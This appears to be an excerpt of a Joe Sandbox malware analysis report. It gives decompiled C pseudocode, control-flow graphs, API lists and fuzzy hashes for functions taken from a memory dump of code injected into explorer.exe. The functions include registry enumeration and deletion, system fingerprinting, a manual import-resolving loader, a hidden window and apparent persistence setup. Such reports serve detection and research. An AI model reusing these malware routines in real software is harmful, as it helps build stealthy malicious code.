                  control_flow_graph 123 861b4-861f9 memset call 88604 126 861ff-86211 call 88604 123->126 127 86363-86369 123->127 126->127 130 86217-86234 RegOpenKeyExW 126->130 131 8623a-8626d 130->131 132 86333-86337 130->132 138 8627f-86284 131->138 139 8626f-8627a 131->139 133 86339-86341 RegCloseKey 132->133 134 86344-86360 call 8861a * 2 132->134 133->134 134->127 138->132 141 8628a 138->141 139->132 144 8628d-862dc memset * 2 141->144 146 862de-862ee 144->146 147 86326-8632d 144->147 149 862f0-86304 146->149 150 86323 146->150 147->132 147->144 149->150 152 86306-86313 call 8c392 149->152 150->147 155 8631c-8631e call 8b1b1 152->155 156 86315-86317 152->156 155->150 156->155
                  C-Code - Quality: 80%
                  			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				void* _t53;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t53 = E00088604(0x3fff); // executed
				_t98 = _t53;
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00088604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						RegCloseKey(_v8);
					}
					E0008861A( &_v32, 0x3fff);
					E0008861A( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0xe7fab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0xe7fab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0xe7fb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0xe7fab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0xe7fab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}
































                  0x000861b4
                  0x000861b4
                  0x000861c0
                  0x000861cf
                  0x000861d2
                  0x000861dc
                  0x000861e4
                  0x000861e7
                  0x000861ea
                  0x000861ef
                  0x000861f1
                  0x000861f4
                  0x000861f9
                  0x00086365
                  0x00086369
                  0x00086369
                  0x00086209
                  0x0008620b
                  0x00086211
                  0x00000000
                  0x00000000
                  0x00086234
                  0x00086333
                  0x00086337
                  0x00086341
                  0x00086341
                  0x0008634d
                  0x0008635b
                  0x00000000
                  0x00086360
                  0x0008623d
                  0x00086241
                  0x00086245
                  0x00086249
                  0x0008624d
                  0x0008624e
                  0x0008624f
                  0x00086250
                  0x00086251
                  0x00086255
                  0x0008625c
                  0x0008625d
                  0x00086262
                  0x0008626d
                  0x00086282
                  0x00086284
                  0x00000000
                  0x00000000
                  0x0008628a
                  0x0008628d
                  0x00086295
                  0x000862a2
                  0x000862a7
                  0x000862aa
                  0x000862b3
                  0x000862ba
                  0x000862ca
                  0x000862d4
                  0x000862da
                  0x000862dc
                  0x000862e1
                  0x000862ea
                  0x000862ec
                  0x000862ee
                  0x000862f0
                  0x000862fa
                  0x00086300
                  0x00086304
                  0x00086308
                  0x0008630d
                  0x00086313
                  0x00086315
                  0x00086317
                  0x00086317
                  0x0008631e
                  0x0008631e
                  0x00086304
                  0x00086323
                  0x00086323
                  0x00086326
                  0x00086327
                  0x0008632a
                  0x0008632a
                  0x00000000
                  0x0008628d
                  0x0008626f
                  0x00086277
                  0x00000000

                  APIs
                  • memset.MSVCRT ref: 000861D2
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                  • memset.MSVCRT ref: 00086295
                  • memset.MSVCRT ref: 000862A2
                  • RegCloseKey.KERNEL32(00000000,?,?,00000001), ref: 00086341
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$AllocateCloseHeapOpen
                  • String ID:
                  • API String ID: 1886988140-0
                  • Opcode ID: 7d7b54c6bf340862ecc78c690511dbbc996331d6175cd715f89be187fe39641c
                  • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                  • Opcode Fuzzy Hash: 7d7b54c6bf340862ecc78c690511dbbc996331d6175cd715f89be187fe39641c
                  • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008CF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E0008CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xb0000
				GetCurrentProcess();
				_t11 = E0008BA05(); // executed
				_t1 = _t29 + 0x1644; // 0xb1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3B6(_t3);
				_t7 = _t29 + 0x220; // 0xb0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








                  0x0008cf87
                  0x0008cf89
                  0x0008cf90
                  0x0008cf98
                  0x0008cfa2
                  0x0008cfa2
                  0x0008cfa8
                  0x0008cfb1
                  0x0008cfb7
                  0x0008cfb9
                  0x0008cfbd
                  0x0008cfbd
                  0x0008cfc2
                  0x0008cfc8
                  0x0008cfd8
                  0x0008cfe2
                  0x0008cfea
                  0x0008cfed
                  0x0008cff9
                  0x0008cfff
                  0x0008d004
                  0x0008d00a
                  0x0008d010
                  0x0008d016
                  0x0008d01e

                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                  • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                  • memset.MSVCRT ref: 0008CFE2
                  • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                  • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$FileModuleNameVersionmemset
                  • String ID:
                  • API String ID: 3581039275-0
                  • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                  • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0009249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 170 9249b-924a9 171 924ab-924ae 170->171 172 924b3-924f3 GetModuleHandleA call 8e099 170->172 173 92660-92661 171->173 176 924f9-92510 172->176 177 9265e 172->177 178 92513-9251a 176->178 177->173 179 9251c-92525 178->179 180 92527-92537 178->180 179->178 181 9253a-92541 180->181 181->177 182 92547-9255e LoadLibraryA 181->182 183 92568-9256e 182->183 184 92560-92563 182->184 185 9257d-92586 183->185 186 92570-9257b 183->186 184->173 187 92589 185->187 186->187 188 9258d-92593 187->188 189 92599-925b1 188->189 190 92650-92659 188->190 191 925b3-925d2 189->191 192 925d4-92602 189->192 190->181 195 92605-9260b 191->195 192->195 196 92639-9264b 195->196 197 9260d-9261b 195->197 196->188 198 9261d-9262f 197->198 199 92631-92637 197->199 198->196 199->196
                  C-Code - Quality: 50%
                  			E0009249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                  0x000924a1
                  0x000924a9
                  0x000924be
                  0x000924d0
                  0x000924dc
                  0x000924e2
                  0x000924e7
                  0x000924f3
                  0x0009265e
                  0x00000000
                  0x0009265e
                  0x000924f9
                  0x00092502
                  0x00092510
                  0x00092513
                  0x00092522
                  0x00092522
                  0x00092529
                  0x00092537
                  0x0009253a
                  0x00092551
                  0x00092557
                  0x0009255e
                  0x0009256e
                  0x00092586
                  0x00092570
                  0x00092578
                  0x00092578
                  0x00092589
                  0x0009258d
                  0x00092599
                  0x0009259d
                  0x000925a1
                  0x000925a5
                  0x000925b1
                  0x000925dc
                  0x000925e4
                  0x000925f6
                  0x00092602
                  0x000925b3
                  0x000925b8
                  0x000925c3
                  0x000925cf
                  0x000925cf
                  0x0009260b
                  0x00092611
                  0x0009261b
                  0x00092637
                  0x0009261d
                  0x0009262c
                  0x0009262c
                  0x0009261b
                  0x0009263f
                  0x00092648
                  0x00092648
                  0x00092656
                  0x00000000
                  0x00092656
                  0x00092562
                  0x00000000
                  0x00092562
                  0x00000000
                  0x0009253a
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                  • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID: GetProcAddress$kernel32.dll
                  • API String ID: 4133054770-1584408056
                  • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                  • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00082EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 200 82eda-82f50 memset call 8902d 205 82fcd-82fd4 200->205 206 82f52-82f81 CreateWindowExA 200->206 207 82fdf-82ff4 205->207 208 82fd6-82fd7 205->208 206->207 209 82f83-82f92 ShowWindow 206->209 208->207 210 82f9b 209->210 212 82fba-82fcb 210->212 212->205 214 82f9d-82fa0 212->214 214->205 215 82fa2-82fb2 214->215 215->212
                  C-Code - Quality: 96%
                  			E00082EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0x9e684; // 0xe7f8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0x9e688; // 0xb0000
				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E00082E77;
				_push( &_v52);
				_t32 =  *0x9e694; // 0xe7fa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0x9e718; // 0x20356
					if(_t34 != 0) {
						_t39 =  *0x9e694; // 0xe7fa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x9e694; // 0xe7fa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0x9e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0x9e694; // 0xe7fa48
				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
				while(1) {
					_t50 =  *0x9e694; // 0xe7fa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x9e694; // 0xe7fa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x9e694; // 0xe7fa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}























                  0x00082ee3
                  0x00082ef2
                  0x00082ef9
                  0x00082efe
                  0x00082f18
                  0x00082f20
                  0x00082f2d
                  0x00082f34
                  0x00082f3a
                  0x00082f41
                  0x00082f42
                  0x00082f47
                  0x00082f50
                  0x00082fcd
                  0x00082fcd
                  0x00082fd4
                  0x00082fd7
                  0x00082fdc
                  0x00082fdc
                  0x00082fdf
                  0x00082fe7
                  0x00082fec
                  0x00082ff4
                  0x00082ff4
                  0x00082f77
                  0x00082f7a
                  0x00082f81
                  0x00000000
                  0x00000000
                  0x00082f8a
                  0x00082f8d
                  0x00082f98
                  0x00082fba
                  0x00082fc1
                  0x00082fc6
                  0x00082fcb
                  0x00000000
                  0x00000000
                  0x00082fa0
                  0x00000000
                  0x00000000
                  0x00082fa6
                  0x00082fab
                  0x00082fb2
                  0x00082fb7
                  0x00082fb7
                  0x00000000

                  APIs
                  • memset.MSVCRT ref: 00082EF9
                  • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
                  • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Window$CreateShowmemset
                  • String ID: 0
                  • API String ID: 3027179219-4108050209
                  • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                  • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
                  • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                  • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00084D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 217 84d6d-84d8f 218 84dee-84e1b call 8b7a8 call 8a86d call 8a471 217->218 219 84d91-84db3 call 895c7 * 2 217->219 234 84e1d-84e20 218->234 235 84e25-84e80 call 8e1bc call 895e1 call 892e5 call 885d5 call 8b269 218->235 219->218 229 84db5-84db7 219->229 229->218 230 84db9-84dc4 GetModuleHandleA 229->230 232 84dcd 230->232 233 84dc6-84dcb GetModuleHandleA 230->233 238 84dd5-84dec call 885c2 * 2 232->238 233->232 233->238 236 852b9-852bf 234->236 252 84ea1-84ed9 call 8861a call 84a0b 235->252 253 84e82-84e93 call 8896f 235->253 238->218 238->234 263 84ef8-84f1b 252->263 264 84edb-84ee3 252->264 259 84e9c-84e9f 253->259 260 84e95-84e97 call 8a2e3 253->260 259->252 260->259 266 84f1d-84f2b 263->266 267 84f2f-84f54 call 8e2c6 263->267 264->263 265 84ee5-84ee9 264->265 268 84eef-84ef2 265->268 269 851f3-85220 call 895e1 call 892e5 265->269 266->267 277 84f71-84f78 267->277 278 84f56-84f6a call 8e2c6 267->278 268->263 268->269 279 85222-8522b call 8b269 269->279 280 85247-852b4 call 885d5 lstrcpynW * 2 call 88fbe call 8861a * 2 269->280 277->269 282 84f7e-84f87 277->282 278->277 292 85239-85246 call 8861a 279->292 293 8522d-85232 279->293 313 852b7 280->313 285 84f89-84f8e 282->285 286 84f96-84fa3 282->286 285->286 289 84f90 285->289 286->269 290 84fa9-84fad 286->290 289->286 294 85082-85088 290->294 295 84fb3-84fb6 290->295 292->280 293->292 294->269 297 8508e-850ff call 849a5 call 8fc1f 294->297 295->269 299 84fbc-8500f call 849a5 call 88604 295->299 297->269 318 85105-85119 call 88604 297->318 299->313 317 85015-8507d call 895e1 call 89640 call 885d5 call 8a911 call 8861a 299->317 313->236 317->313 318->269 324 8511f-85171 call 8109a call 8902d call 860df 318->324 337 85173-851dd call 89640 call 885d5 call 8a911 call 8861a 324->337 338 851e5-851f2 call 8861a 324->338 349 851e2 337->349 338->269 349->338
                  C-Code - Quality: 70%
                  			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xb0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E0008A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A471( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
						 *0x9e680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000895E1(0x9b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xb0000
						_t127 = E000892E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885D5( &_v612);
						_t130 = E0008B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E0008861A( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xb0000
						_t22 = _t133 + 0x114; // 0xb0114
						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xb0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0xe7fdb0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E0008E2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0xe7fa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E2C6(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0xe7fa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0xe7fdb0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xb0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000849A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0xe7f8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xb0000
											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E00088604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xb0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008902D(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xb0000
													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xb0000
														__eflags = _t200 + 0x1020;
														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885D5( &_v636);
														E0008A911(_t333, 0, 0xbb8, 1); // executed
														E0008861A( &_v632, 0xfffffffe); // executed
														_t339 = _t339 + 0x44;
													}
													E0008861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000849A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0xe7f8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
